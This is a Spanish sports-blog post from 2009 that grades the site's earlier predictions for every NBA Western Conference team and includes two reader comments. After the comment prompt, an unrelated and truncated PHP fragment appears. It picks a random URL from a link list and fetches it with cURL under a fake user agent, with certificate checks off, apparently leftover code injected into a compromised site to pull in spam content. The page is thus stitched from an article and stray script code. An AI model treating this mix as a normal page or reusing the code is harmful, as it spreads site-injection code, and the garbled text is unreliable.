Revisando los pronósticos del Oeste

24 de February de 2009 por TheDeerHunter

A principios de temporada nos disfrazamos de adivinos y agoreros y nos lanzamos a realizar sesudos análisis de cada una de las franquicias de la liga. Comentamos sus puntos fuertes y débiles, los probables quintetos titulares y nos lanzamos a la piscina con una predicción de su posición final. Ahora, después de haber sobrepasado la fecha límite para los traspasos, creemos que es momento revisar a ver si nuestras predicciones van por buen camino. Aplausos para los que parece que acertarán y capones para el resto. Empezemos por el Oeste:


DIVISIÓN NORTHWEST

1.- DENVER: Éste fue nuestro pronóstico – Proyección Final: Top 4 del Oeste.

Poco se puede salvar de este completo desatino. Tras largar a Camby, teórico baluarte defensivo, y oyendo otros rumores de salidas todo hacía indicar que se iban directos al pozo. Era difícil prever el lavado de cara que supuso la llegada de Billups aunque quizá no lo era tanto el ser concientes que Iverson (o si lo piensas incluso Camby) no beneficiaban precísamente los intereses del equipo. El mayor error fue el atribuir una mayor cota de culpabilidad a Karl y Carmelo, que luego sí han demostrado su capacidad de ponerse serios llegado el caso. Tampoco supimos imaginar la buena temporada que podían hacer Nené y K.Martin.

Nivel de acierto: E (más fallón que Iverson tirándose hasta las zapas)

2.- PORTLAND: Éste fue nuestro pronóstico – Proyección Final: 1ª ronda de Playoffs.

Mucho tino en el análisis de Gallis. Fue incluso precavido de poner el “inminente” impacto de Oden en cuarentena. No fue capaz, sin embargo, de alcanzar a adivinar la titularidad de Batum y la escasa relevancia de Bayless pero eso ya hubiera sido de matricula. Eso sí…  vió que Outlaw no iba a estar nada contento con su nueva situación. Tiene mérito.

Nivel de acierto: A (Si Gallis fuera Roy, probablemente también hubiera metido aquel triple en el último segundo contra Houston)

3.- UTAH: Éste fue nuestro pronóstico – Proyección Final: 1ª ronda de Playoffs.

Los Jazz han ido malviviendo entre lesión y lesión de sus jugadores clave. En ningún momento de la temporada han contado con su plantilla al completo y durante muchos momentos han dado la sensación de no llegarles siquiera para clasificarse para las eliminatorias. Boozer pronto dejó claro que se iba a largar y para colmo se lesionó. No será su temporada y ese detalle los deja fuera de casi todo. En su día también hablamos de Korver como factor clave y tampoco nos ha dejado en buen lugar. Por suerte, Millsap ha dado un paso adelante y Kirilenko, mientras ha estado sano se ha mostrado muy cómodo en su papel de 6º hombre.

Nivel de acierto: C- (“No tan lejos”… del aprobado raspado)

4.- MINNESOTA: Éste fue nuestro pronóstico – Proyección Final: Fuera de Playoffs aunque mejorando su balance anterior.

A 4 victorias de mejorar el récord del año pasado, parece que finalmente lo lograrán aún sin Jefferson. Con todo se esperaba algo más de este equipo, aunque sólo fuera buena imagen general. Ha habido momentos de muy mal juego, aunque McHale sí ha logrado finalmente coger las riendas del equipo con bastante acierto. Sí será posible que apunten playoffs en una o dos temporadas.

Nivel de acierto: B (Con alguna piececilla más que hubiera casado… Txusma hubiera dado su pasito hacia el sobresaliente)

5.- OKLAHOMA: Éste fue nuestro pronóstico – Proyección Final: Luchando por “escapar” de la cuchara de madera.

Durante la mayor parte de la temporada han sido un equipo desastroso. Sin embargo, de un tiempo a esta parte se ha demostrado una intención más en la línea de evitar quedar los últimos que de buscar ese Nº1 del draft que dijimos en su día. El fichaje de Krstic y los titánicos esfuerzos por ganar de Durant, Green y Westbrook los alejan de cualquier sospecha… al menos de momento. Al final nuestro mayor acierto fue valorar que se están haciendo las cosas bien en ese equipo y que han logrado format una base para una futura columna vertebral atractiva para fichar agentes libres.

Nivel de acierto: B+ (Queco como Durant… rozando la excelencia en cada partido)

DIVISIÓN PACÍFICO

1.- LOS ANGELES LAKERS: Éste fue nuestro pronóstico – Proyección Final: Campeonato.

No ha sido tan fácil como se creía mantener viva la apuesta (o la esperanza). Desde el principio se han ido superando ciertos obstáculos que han ido surgiendo: desde la titularidad de Radmanovic, la suplencia mal asimilada y la baja forma de Odom, la lesión inicial de Vujacic, la posterior de Farmar, el mal juego inicial de Bynum o el mazazo de su lesión cuando mejor lo estaba haciendo… hacían dudar de lo de “Ganar es un deber”. No obstante, los Lakers encabezan hoy por hoy la liga jugando bien, gracias a otras gratas sorpresas como el nivel AllStar de Gasol, el gran papel suplente de Ariza o el resurgir del Fénix Odom. El pronóstico no se hará bueno o malo hasta el final pero no cabe duda de que va por buen camino… y mejor iría de poder contar con Bynum. Veremos.

Nivel de acierto: A (Mientras no se demuestre lo contrario, Phil, Kobe y nuestro editor Magic32 son los amos)

2.- PHOENIX: Éste fue nuestro pronóstico – Proyección Final: Sufriendo por Playoffs.

Porter no ha podido/sabido imprimir ningún carácter a este equipo. En su sistema control Nash se ha perdido y con Shaq en la zona Stoudamire se ha asfixiado. El descenso de puntos en contra únicamente ha venido por el descenso del ritmo, no por la defensa deseable. Para colmo la adquisición de Richardson sólo sirvió para acentuar más los defectos. No ha salido nada… ni siquiera la reconstrucción.

Nivel de acierto: D (El pronóstico, como los Suns, tenía mejor pinta antes de empezar la temporada)

3.- GOLDEN STATE WARRIORS: Éste fue nuestro pronóstico – Proyección Final: Fuera de Playoffs… segurísimo

No sabemos qué ha sido más determinante, el accidente de Monta o la paranoia ultraofensiva de Don Nelson. El hecho es que la mayoría de las noches cualquier parecido de un partido con los Warriors a cualquier cosa que no sea un circo era pura coincidencia. Pero el caos más absoluto no ha quedado aquí, con el malestar de Al Harrington la franquicia no ha hecho otra cosa que amasar alegremente Shooting Guards a mansalva intentando seguir un “no sabemos qué tipo de modelo sin sentido de plantilla”.

Nivel de acierto: B (Que Magic no se eche mocarros, que el enfoque del pronóstico poco tiene que ver con lo que ha sucedido en realidad, aunque el resultado sea el mismo)

4.- LOS ANGELES CLIPPERS: Éste fue nuestro pronóstico – Proyección Final: 40-45 victorias… ni matando al resto de los equipos, vamos.

Los Clippers están malditos. Es así. Esto no se salvaba ni habiendo retenido a Brand (sólo les hubiera faltado ya eso). Baron Davis parece un teleñeco de sí mismo, lesiones a mansalva, partidos perdidos a puñados, la sabiduría de Dunleavy… A favor del pronóstico es que, jugador por jugador más la sorpresa agradable de Gordon y la inclusión de Randolph, era casi imposible vislumbrar esta carnicería… pero siendo los Clippers deberíamos haberlo imaginado. Y el culmen es que se dice que Jason Williams ha pedido volver… pero no en los Clippers!!! Tronchante el tipo.

Nivel de acierto: E (Dicen las malas lenguas que los seguidores de los Clippers utilizan algún tipo de sustancia psicotrópica de última generación para escribir sus pronósticos. ¡Pruebas anti-doping para los redactores ya!!!)

5.- SACRAMENTO KINGS: Éste fue nuestro pronóstico – Proyección Final: Reconstrucción de la reconstrucción…

Tanto como viento en popa no hemos visto el proyecto de Sacramento en ningún momento. Lo cierto es que poco se puede vislumbrar de lo que hay ni siquiera frente a ese hipotético 2010 del que todos hablan. Lo más que podemos apreciar es que buscan mucho margen salarial y algún puesto alto del draft del año que viene. Yo no hablaría ni de proyecto… más bien lástima por Kevin Martin.

Nivel de acierto: C- (Sí, acertamos el resultado… que no hacía falta ser Nostradamus para hacerlo. Sólo porque 3 de los teóricos titulares que se pronosticaron ya no siguen en el equipo deberíamos habernos puesto un suspenso claro)

DIVISIÓN SOUTHWEST

1.- SAN ANTONIO SPURS: Este fue nuestro pronóstico – Proyección final: Top 3 del Oeste

A principio de temporada parecía que la falta de fe de MagicJohnson32 estaba más que justificada y que “las últimas etapas de un largo y cansado viaje” llegaban más rápido de lo que nadie auguraba. Pero como también apuntaba muy bien el análisis, a los Spurs no hay que darlos por muertos jamás y actualmente van camino de cumplir el pronóstico o incluso de mejorarlo. Eso sí, los actores son un tanto diferentes de los que imaginábamos: Roger Mason, George Hill y Matt Bonner son mucho más importantes de lo que pudimos imaginar en un principio y el que está quemando definitivamente los últimos días de su carrera deportiva es Bruce Bowen. Aún no sé si me alegro o no…

Nivel de acierto: B+ (A Magic tampoco hay que darlo por muerto nunca)

2.- NEW ORLEANS HORNETS: Este fue nuestro pronóstico – Proyección final: Semifinales de Conferencia

Sin duda habría que ser un pajaro de mal agüero o un desconfiado de la vida para no haber colmado de elogios a los Hornets a principios de la vida. Pero de manera sorprendente las cosas no les están saliendo como esperaban: Chandler no es el de la temporada pasada en parte debido a las lesiones y West tampoco acaba de encontrar el punch. A pesar de que Paul sigue a un nivel mayúsculo la irregularidad se ha instalado en la franquicia de Luisiana, capaz de ganar a los Magic un día y perder con New York al siguiente. El traspaso frustrado de Chandler ha acabado de enturbiar el ánimo de la plantilla y de la afición y hará falta el compromiso de todos y el mejor nivel de los jugadores si quieren acabar entre los 3 primeros del Oeste y eliminar cualquier resquicio de duda. De todas maneras quedan muy lejos de ser considerados candidatos al anillo como se podría desprender del análisis.

Nivel de acierto: C (O a lo mejor es una táctica para ir de tapados en Playoffs… ¿Vale como excusa?)

3.- HOUSTON ROCKETS: Este fue nuestro pronóstico – Proyección final: O fuera de Playoffs o clasificados por los pelos

Tras releer el análisi de Viva_Dirk lo único que puedo hacer es quitarme el sombrero y arrollidarme ante la persona que auguró el fracaso de los Rockets contra viento y marea. Mira que le cayeron palos en los comentarios pero el tiempo le ha dado la razón: Houston va camino de quedarse fuera de Playoffs o como mínimo va a tener que luchar lo indecible para clasificarse. La lesión de T-Mac para lo que queda de temporada y el traspaso de Alston no hacen sinó confirmar el pronóstico. Físicamente el alero no ha estado nunca al 100% y ya nos cuesta creer que algún día lo volvamos a ver en plenitud. Artest, por su parte, también ha tenido problemas físicos, como Battier, pero en contra de lo que se esperaba no ha dado ni un problema extradeportivo. Y es que es una lástima que en un año en que Yao Ming se mantiene sano al resto de sus compañeros le asolen las lesiones. Ale! Ya tenemos nueva (vieja) excusa…

Nivel de acierto: A (Este Viva_Dirk es grande, grande)

4.- DALLAS MAVERICKS: Este fue nuestro pronóstico – Proyección final: Primera ronda de Playoffs.

Gallis lo vio claro desde el principio. Estos Mavs, anclados en la indecisión más absoluta, suficiente harán con clasificarse para Playoffs. Una vez allí Dirk y Kidd dirán. Tras un inicio titubeante el alemán ha recuperado su mejor nivel (aunque ahora, tras el AllStar esté pasando un pequeño bache) pero ni así Dallas termina de carburar. Kidd dejó de ser Kidd hace un par de años, Josh Howard ha estado involucrado en casi cualquier rumor de traspaso que concernía a los tejanos y Jerry Stackhouse se ha pasado lesionado la mayor parte de la temporada. Así las cosas la única buena noticia son los partidos que de vez en cuando se marca Juan José Barea. ¡Quién lo iba a decir!

Nivel de acierto: A (El que no mostró indecisión en ningún momento fue Gallis. ¡Menudo crack!)

5.- MEMPHIS GRIZZLIES: Este fue nuestro pronóstico – Proyección final:  Fuera de Playoffs y revisando sus metas.

Este Viva es muy listo. ¿Hay pronóstico más ambiguo que el que hizo? Por un lado podríamos decir que los Grizzlies están cumpliendo eso de no ganar muchos partidos y ganar experiencia en forma de dolorosas derrotas y por el otro, hablar de que el experimento Mayo-Gay no funciona a no ser que hayan 2 balones en juego, que Iavaroni ya no está y que incluso Marc se ha permitido el lujo de salir a la palestra a rajar de algún rumor que no era de su agrado. Supongo que no era esto lo que tenía en mente Viva_Dirk con su pronóstico. La juventud por si sola no tiene porque ser positiva y Memphis está al nivel de los peores equipos de la liga dando además bastante mala imagen. Por suerte, OJ Mayo y Marc Gasol si que cumplen las expectativas. Dejémosles un añito más, a ver si acaban de confirmarlas.

Nivel de acierto: C (Ni frio ni calor. 0 grados)

Comenta

2 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    En general los pronósticos fueron bastante buenos, creo yo. Los que más se alejan son los que afectan a equipos que han sufrido muchas lesiones (como Clippers) o han hecho traspasos importantes (como Denver), factores imprevisibles.

    Enhorabuena a todos, somos muy buenos 😀

      Citar

  2. Jabho dice:
    #2

    Pues si muy acertados en general. De todas formas aun falta acabar porque muchos equipos del Oeste no se sabe si suben o si bajan (Mavs, Suns, Rockets, Jazz, Hornets) y están tan igualados que hay mucho margen para que cambien las cosas….

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>